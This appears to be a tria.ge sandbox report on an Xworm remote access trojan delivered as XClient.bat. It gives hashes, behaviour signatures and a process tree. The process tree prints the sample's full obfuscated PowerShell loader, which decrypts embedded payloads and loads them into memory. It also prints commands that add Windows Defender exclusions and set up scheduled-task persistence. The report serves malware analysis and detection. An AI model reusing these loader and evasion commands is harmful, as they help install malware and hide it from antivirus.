Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

04/09/2024, 03:02

240904-djne2svhpa 10

04/09/2024, 03:01

240904-djb21svhne 1

04/09/2024, 01:09

240904-bhv3dstbjg 10

03/09/2024, 23:53

240903-3xrgaszhqm 10

03/09/2024, 23:29

240903-3gywfa1fna 10

03/09/2024, 23:26

240903-3ev2rs1erg 10

Analysis

  • max time kernel
    120s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/09/2024, 01:09

General

  • Target

    XClient.bat

  • Size

    320KB

  • MD5

    e0d59aedb927f0aad0b47eab247e5fbc

  • SHA1

    8abe8db8e344729b0f78d83e540b17a31893ed92

  • SHA256

    ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c

  • SHA512

    7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97

  • SSDEEP

    6144:HQIYl64Q3Gx/E7X3YIzsUW4MN2nwaF0FbD/VdFzqEE/jeT3/:HQIh77X3t6+4VdFzoW/

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_555_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_555.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1216
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_555.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_555.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1132
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:3024
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_555.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_555.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • UAC bypass
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1316
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2856
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:448
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:900
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:808
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4040
      • C:\Users\Admin\AppData\Roaming\System User
        "C:\Users\Admin\AppData\Roaming\System User"
        1⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:3796

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        345e9f98bd5ff1def2f4cd73d9f83a8e

        SHA1

        9132828267045915fd009f9eac20def8371814be

        SHA256

        bc9dbd892f1a74587f2a6810ede52e86c81872e9703c7c8ab05039994a45f1aa

        SHA512

        5bf601c8463ba6a877a8f399bcfbd3b8ae456a008ab25461c574a6cdb98fff44bdac0b1304a526438b6c87d4ec735a382e2af3b17580a71f3fe54f5e48ff579f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        dcac476fa19b9b7e00d97d937daf7e9f

        SHA1

        2753854fb9097e0c50667c4df11e336bada512e2

        SHA256

        ebbf20b0c098d467090c4115109b5f707b559a8006e9c17f00235a5d23d60399

        SHA512

        81d587000267413d0b829d783aa2ea4d6f7dfdf991d0463cd49bae3090f36db0b16a63b1ca28ae9a8e52fe2a516bffbad3ff624d5b55e8956d728bb44ed5ea4f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        cc19bcff372d20459d3651ba8aef50e7

        SHA1

        3c6f1d4cdd647864fb97a16b1aefba67fcee11f7

        SHA256

        366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9

        SHA512

        a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfakrw0a.1vq.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\System User

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Roaming\startup_str_555.bat

        Filesize

        320KB

        MD5

        e0d59aedb927f0aad0b47eab247e5fbc

        SHA1

        8abe8db8e344729b0f78d83e540b17a31893ed92

        SHA256

        ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c

        SHA512

        7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97

      • C:\Users\Admin\AppData\Roaming\startup_str_555.vbs

        Filesize

        115B

        MD5

        a7b7b62f3b27442287c18f730b0a11b9

        SHA1

        3b680024c1c2d8c8eaccb1c547b1dd551543a335

        SHA256

        5fa765ed4e0693111ee9e12623bff7d68cc0bb2c67522692681523c9f9e5853b

        SHA512

        3cb48ead89cea278623df38db52e56ba3edabdbc244a60914acf09f5e56a60d2a4da6a3d2539e8c85049602f4a7cd55f0126207ec9910e854bc3e1432f84941a

      • memory/1216-27-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/1216-30-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/1216-26-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/1216-25-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/1316-97-0x000002197E100000-0x000002197E10E000-memory.dmp

        Filesize

        56KB

      • memory/1316-112-0x000002197E370000-0x000002197E3DA000-memory.dmp

        Filesize

        424KB

      • memory/1316-49-0x000002197DC60000-0x000002197DCBA000-memory.dmp

        Filesize

        360KB

      • memory/1316-114-0x000002197E9C0000-0x000002197EEE8000-memory.dmp

        Filesize

        5.2MB

      • memory/1316-113-0x000002197E3E0000-0x000002197E490000-memory.dmp

        Filesize

        704KB

      • memory/2064-11-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/2064-14-0x0000025B9EB30000-0x0000025B9EB6E000-memory.dmp

        Filesize

        248KB

      • memory/2064-12-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/2064-13-0x0000025B845D0000-0x0000025B845D8000-memory.dmp

        Filesize

        32KB

      • memory/2064-0-0x00007FFE912D3000-0x00007FFE912D5000-memory.dmp

        Filesize

        8KB

      • memory/2064-6-0x0000025B9E8E0000-0x0000025B9E902000-memory.dmp

        Filesize

        136KB

      • memory/2064-50-0x00007FFE912D0000-0x00007FFE91D91000-memory.dmp

        Filesize

        10.8MB

      • memory/3796-108-0x000001FEA72E0000-0x000001FEA7324000-memory.dmp

        Filesize

        272KB

      • memory/3796-109-0x000001FEA75B0000-0x000001FEA7626000-memory.dmp

        Filesize

        472KB